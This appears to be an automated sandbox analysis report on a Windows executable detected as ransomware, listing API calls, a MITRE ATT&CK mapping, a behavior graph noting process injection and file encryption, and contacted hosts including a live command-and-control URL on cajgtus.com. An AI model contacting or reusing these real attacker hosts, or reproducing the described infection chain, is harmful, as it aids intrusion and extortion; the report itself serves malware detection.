          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_free,_free,_free,_free,_free,_free,_free,_free,_free,1_2_0043404A
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage,1_2_00438178
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,1_2_00440116
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,1_2_004382A2
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: GetLocaleInfoW,_GetPrimaryLen,1_2_0043834F
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: _memset,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromCountry,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,___crtDownlevelLCIDToLocaleName,___crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,__itow_s,1_2_00438423
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: EnumSystemLocalesW,1_2_004387C8
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: GetLocaleInfoW,1_2_0043884E
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,_free,_free,1_2_00432B6D
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,_free,_free,1_2_00432FAD
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,1_2_004335E7
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,_LcidFromHexString,GetLocaleInfoW,1_2_00437BB3
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: EnumSystemLocalesW,1_2_00437E27
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,1_2_00437E83
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,1_2_00437F00
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,1_2_0042BF17
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: _LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,_TestDefaultLanguage,1_2_00437F83
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,4_2_05E13F87
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_free,_free,_free,_free,_free,_free,_free,_free,_free,4_2_05E149EA
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,_free,_free,4_2_05E1394D
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: ___crtGetLocaleInfoA,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,__invoke_watson,4_2_05E0C8B7
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,4_2_05E20AB6
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_free,_free,_free,_free,_free,_free,_free,_free,_free,5_2_0043404A
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage,5_2_00438178
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,5_2_00440116
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,5_2_004382A2
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: GetLocaleInfoW,_GetPrimaryLen,5_2_0043834F
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: _memset,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromCountry,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,___crtDownlevelLCIDToLocaleName,___crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,__itow_s,5_2_00438423
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: EnumSystemLocalesW,5_2_004387C8
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: GetLocaleInfoW,5_2_0043884E
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,_free,_free,5_2_00432B6D
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,_free,_free,5_2_00432FAD
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,5_2_004335E7
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,_LcidFromHexString,GetLocaleInfoW,5_2_00437BB3
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: EnumSystemLocalesW,5_2_00437E27
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,5_2_00437E83
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,5_2_00437F00
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,5_2_0042BF17
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: _LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,_TestDefaultLanguage,5_2_00437F83
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 0_2_00409DFB GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00409DFB
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 1_2_00419F90 GetCurrentProcess,GetLastError,GetLastError,SetPriorityClass,GetLastError,GetModuleFileNameW,PathRemoveFileSpecW,GetCommandLineW,CommandLineToArgvW,lstrcpyW,lstrcmpW,lstrcmpW,lstrcpyW,lstrcpyW,lstrcmpW,lstrcmpW,GlobalFree,lstrcpyW,lstrcpyW,OpenProcess,WaitForSingleObject,CloseHandle,Sleep,GlobalFree,GetCurrentProcess,GetExitCodeProcess,TerminateProcess,CloseHandle,lstrcatW,GetVersion,lstrcpyW,lstrcatW,lstrcatW,_memset,ShellExecuteExW,CreateThread,lstrlenA,lstrcatW,_malloc,lstrcatW,_memset,lstrcatW,MultiByteToWideChar,lstrcatW,lstrlenW,CreateThread,WaitForSingleObject,CreateMutexA,CreateMutexA,lstrlenA,lstrcpyA,_memmove,_memmove,_memmove,GetUserNameW,GetMessageW,GetMessageW,DispatchMessageW,TranslateMessage,TranslateMessage,DispatchMessageW,GetMessageW,PostThreadMessageW,PeekMessageW,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,CloseHandle,1_2_00419F90
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 1_2_0042FE47 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,1_2_0042FE47
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 1_2_00419F90 GetCurrentProcess,GetLastError,GetLastError,SetPriorityClass,GetLastError,GetModuleFileNameW,PathRemoveFileSpecW,GetCommandLineW,CommandLineToArgvW,lstrcpyW,lstrcmpW,lstrcmpW,lstrcpyW,lstrcpyW,lstrcmpW,lstrcmpW,GlobalFree,lstrcpyW,lstrcpyW,OpenProcess,WaitForSingleObject,CloseHandle,Sleep,GlobalFree,GetCurrentProcess,GetExitCodeProcess,TerminateProcess,CloseHandle,lstrcatW,GetVersion,lstrcpyW,lstrcatW,lstrcatW,_memset,ShellExecuteExW,CreateThread,lstrlenA,lstrcatW,_malloc,lstrcatW,_memset,lstrcatW,MultiByteToWideChar,lstrcatW,lstrlenW,CreateThread,WaitForSingleObject,CreateMutexA,CreateMutexA,lstrlenA,lstrcpyA,_memmove,_memmove,_memmove,GetUserNameW,GetMessageW,GetMessageW,DispatchMessageW,TranslateMessage,TranslateMessage,DispatchMessageW,GetMessageW,PostThreadMessageW,PeekMessageW,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,CloseHandle,1_2_00419F90
          Source: C:\Users\user\Desktop\mU2p71KMss.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Mitre Att&ck Matrix

          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
          Native API          		1
          DLL Side-Loading          		1
          Exploitation for Privilege Escalation          		1
          Deobfuscate/Decode Files or Information          		OS Credential Dumping2
          System Time Discovery          		Remote Services11
          Archive Collected Data          		2
          Ingress Tool Transfer          		Exfiltration Over Other Network Medium2
          Data Encrypted for Impact
          CredentialsDomainsDefault Accounts3
          Command and Scripting Interpreter          		1
          Registry Run Keys / Startup Folder          		1
          DLL Side-Loading          		2
          Obfuscated Files or Information          		LSASS Memory1
          Account Discovery          		Remote Desktop Protocol1
          Screen Capture          		21
          Encrypted Channel          		Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAt1
          Services File Permissions Weakness          		211
          Process Injection          		2
          Software Packing          		Security Account Manager2
          File and Directory Discovery          		SMB/Windows Admin SharesData from Network Shared Drive2
          Non-Application Layer Protocol          		Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
          Registry Run Keys / Startup Folder          		1
          DLL Side-Loading          		NTDS24
          System Information Discovery          		Distributed Component Object ModelInput Capture13
          Application Layer Protocol          		Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script1
          Services File Permissions Weakness          		1
          Masquerading          		LSA Secrets1
          Query Registry          		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts211
          Process Injection          		Cached Domain Credentials141
          Security Software Discovery          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
          Services File Permissions Weakness          		DCSync2
          Process Discovery          		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
          System Owner/User Discovery          		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
          System Network Configuration Discovery          		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1431118 Sample: mU2p71KMss.exe Startdate: 24/04/2024 Architecture: WINDOWS Score: 100 46 cajgtus.com 2->46 48 api.2ip.ua 2->48 54 Snort IDS alert for network traffic 2->54 56 Found malware configuration 2->56 58 Malicious sample detected (through community Yara rule) 2->58 60 6 other signatures 2->60 9 mU2p71KMss.exe 2->9         started        12 mU2p71KMss.exe 2->12         started        14 mU2p71KMss.exe 2->14         started        16 mU2p71KMss.exe 2->16         started        signatures3 process4 signatures5 64 Antivirus detection for dropped file 9->64 66 Multi AV Scanner detection for dropped file 9->66 68 Detected unpacking (changes PE section rights) 9->68 76 2 other signatures 9->76 18 mU2p71KMss.exe 1 18 9->18         started        70 Detected unpacking (overwrites its own PE header) 12->70 72 Contains functionality to inject code into remote processes 12->72 74 Injects a PE file into a foreign processes 12->74 23 mU2p71KMss.exe 1 16 12->23         started        25 mU2p71KMss.exe 12 14->25         started        27 mU2p71KMss.exe 16->27         started        process6 dnsIp7 50 cajgtus.com 62.150.232.50, 49707, 80 QNETKuwaitKW Kuwait 18->50 36 C:\Users\user\_README.txt, ASCII 18->36 dropped 38 C:\Users\user\...\mU2p71KMss.exe.bgzq (copy), MS-DOS 18->38 dropped 40 C:\Users\user\Desktop\mU2p71KMss.exe, MS-DOS 18->40 dropped 44 4 other malicious files 18->44 dropped 62 Modifies existing user documents (likely ransomware behavior) 18->62 52 api.2ip.ua 104.21.65.24, 443, 49704, 49705 CLOUDFLARENETUS United States 23->52 42 C:\Users\user\AppData\...\mU2p71KMss.exe, PE32 23->42 dropped 29 mU2p71KMss.exe 23->29         started        32 icacls.exe 23->32         started        file8 signatures9 process10 signatures11 78 Injects a PE file into a foreign processes 29->78 34 mU2p71KMss.exe 12 29->34         started        process12

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          mU2p71KMss.exe100%AviraHEUR/AGEN.1313019
          mU2p71KMss.exe100%Joe Sandbox ML

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe100%AviraHEUR/AGEN.1313019
          C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe45%ReversingLabsWin32.Trojan.Generic

          Unpacked PE Files

          No Antivirus matches

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.wikipedia.com/0%URL Reputationsafe
          http://cajgtus.com/test2/get.php?pid=903E7F261711F85395E5CEFBF4173C540%Avira URL Cloudsafe
          http://https://ns1.kriston.ugns2.chalekin.ugns3.unalelath.ugns4.andromath.ug/Error0%Avira URL Cloudsafe
          http://cajgtus.com/test2/get.php0%Avira URL Cloudsafe
          http://cajgtus.com/test2/get.phprk0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          cajgtus.com
          		62.150.232.50
          		truetrue
            		unknown
            api.2ip.ua
            		104.21.65.24
            		truefalse
              		high

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              http://cajgtus.com/test2/get.php?pid=903E7F261711F85395E5CEFBF4173C54true
              • Avira URL Cloud: safe
              		unknown
              https://api.2ip.ua/geo.jsonfalse
                		high
                http://cajgtus.com/test2/get.phptrue
                • Avira URL Cloud: safe
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://cajgtus.com/test2/get.phprkmU2p71KMss.exe, 00000007.00000002.3243271467.0000000000707000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://www.nytimes.com/mU2p71KMss.exe, 00000007.00000003.2095243165.0000000003560000.00000004.00001000.00020000.00000000.sdmpfalse
                  		high
                  https://api.2ip.ua/mU2p71KMss.exe, 00000001.00000002.2009528237.00000000008F7000.00000004.00000020.00020000.00000000.sdmp, mU2p71KMss.exe, 00000001.00000003.2003059893.0000000000906000.00000004.00000020.00020000.00000000.sdmp, mU2p71KMss.exe, 00000005.00000003.2024120427.0000000000731000.00000004.00000020.00020000.00000000.sdmp, mU2p71KMss.exe, 00000005.00000003.2024457872.0000000000732000.00000004.00000020.00020000.00000000.sdmp, mU2p71KMss.exe, 00000005.00000002.2025188604.0000000000732000.00000004.00000020.00020000.00000000.sdmp, mU2p71KMss.exe, 00000007.00000002.3243271467.0000000000707000.00000004.00000020.00020000.00000000.sdmp, mU2p71KMss.exe, 00000007.00000003.2036117451.0000000000711000.00000004.00000020.00020000.00000000.sdmp, mU2p71KMss.exe, 0000000A.00000002.2167918166.0000000000768000.00000004.00000020.00020000.00000000.sdmp, mU2p71KMss.exe, 0000000A.00000003.2166629017.0000000000766000.00000004.00000020.00020000.00000000.sdmp, mU2p71KMss.exe, 0000000D.00000002.2252580072.00000000006C9000.00000004.00000020.00020000.00000000.sdmpfalse
                    		high
                    https://wetransfer.com/downloadsVnmU2p71KMss.exe, 00000007.00000002.3243271467.00000000007A8000.00000004.00000020.00020000.00000000.sdmpfalse
                      		high
                      https://api.2ip.ua/amU2p71KMss.exe, 00000005.00000003.2024120427.0000000000731000.00000004.00000020.00020000.00000000.sdmp, mU2p71KMss.exe, 00000005.00000003.2024457872.0000000000732000.00000004.00000020.00020000.00000000.sdmp, mU2p71KMss.exe, 00000005.00000002.2025188604.0000000000732000.00000004.00000020.00020000.00000000.sdmpfalse
                        		high
                        https://api.2ip.ua/geo.jsonhymU2p71KMss.exe, 00000005.00000003.2024120427.0000000000731000.00000004.00000020.00020000.00000000.sdmp, mU2p71KMss.exe, 00000005.00000003.2024457872.0000000000732000.00000004.00000020.00020000.00000000.sdmp, mU2p71KMss.exe, 00000005.00000002.2025188604.0000000000732000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high
                          https://api.2ip.ua/geo.jsonpTfmU2p71KMss.exe, 00000005.00000002.2025045423.00000000006D8000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            https://api.2ip.ua/KmU2p71KMss.exe, 00000007.00000002.3243271467.0000000000707000.00000004.00000020.00020000.00000000.sdmp, mU2p71KMss.exe, 00000007.00000003.2036117451.0000000000711000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              http://www.amazon.com/mU2p71KMss.exe, 00000007.00000003.2094960142.0000000003560000.00000004.00001000.00020000.00000000.sdmpfalse
                                		high
                                http://www.twitter.com/mU2p71KMss.exe, 00000007.00000003.2095368781.0000000003560000.00000004.00001000.00020000.00000000.sdmpfalse
                                  		high
                                  http://www.openssl.org/support/faq.htmlmU2p71KMss.exe, 0000000D.00000002.2252233144.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                    		high
                                    https://api.2ip.ua/geo.jsonmpmU2p71KMss.exe, 00000001.00000002.2009528237.00000000008B8000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      https://api.2ip.ua/geo.jsonbmU2p71KMss.exe, 0000000D.00000002.2252580072.0000000000688000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        https://api.2ip.ua/geo.json=mU2p71KMss.exe, 00000001.00000002.2009528237.00000000008B8000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          http://https://ns1.kriston.ugns2.chalekin.ugns3.unalelath.ugns4.andromath.ug/ErrormU2p71KMss.exe, 00000000.00000002.1990128449.0000000005DD0000.00000040.00001000.00020000.00000000.sdmp, mU2p71KMss.exe, 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, mU2p71KMss.exe, 00000004.00000002.2012565443.0000000005DE0000.00000040.00001000.00020000.00000000.sdmp, mU2p71KMss.exe, 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, mU2p71KMss.exe, 00000006.00000002.2025228021.0000000005DC0000.00000040.00001000.00020000.00000000.sdmp, mU2p71KMss.exe, 00000007.00000002.3243111162.0000000000400000.00000040.00000400.00020000.00000000.sdmp, mU2p71KMss.exe, 00000009.00000002.2156207791.0000000005C80000.00000040.00001000.00020000.00000000.sdmp, mU2p71KMss.exe, 0000000A.00000002.2167150824.0000000000400000.00000040.00000400.00020000.00000000.sdmp, mU2p71KMss.exe, 0000000C.00000002.2241519623.0000000005E10000.00000040.00001000.00020000.00000000.sdmp, mU2p71KMss.exe, 0000000D.00000002.2252233144.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		low
                                          https://api.2ip.ua/geo.json9mU2p71KMss.exe, 0000000D.00000002.2252580072.00000000006C9000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            https://api.2ip.ua/geo.jsonySmU2p71KMss.exe, 00000005.00000002.2025045423.00000000006D8000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              https://api.2ip.ua/DmU2p71KMss.exe, 0000000D.00000002.2252580072.00000000006C9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                https://api.2ip.ua/geo.jsontmU2p71KMss.exe, 00000005.00000002.2025045423.00000000006D8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://www.youtube.com/mU2p71KMss.exe, 00000007.00000003.2095490468.0000000003560000.00000004.00001000.00020000.00000000.sdmpfalse
                                                    		high
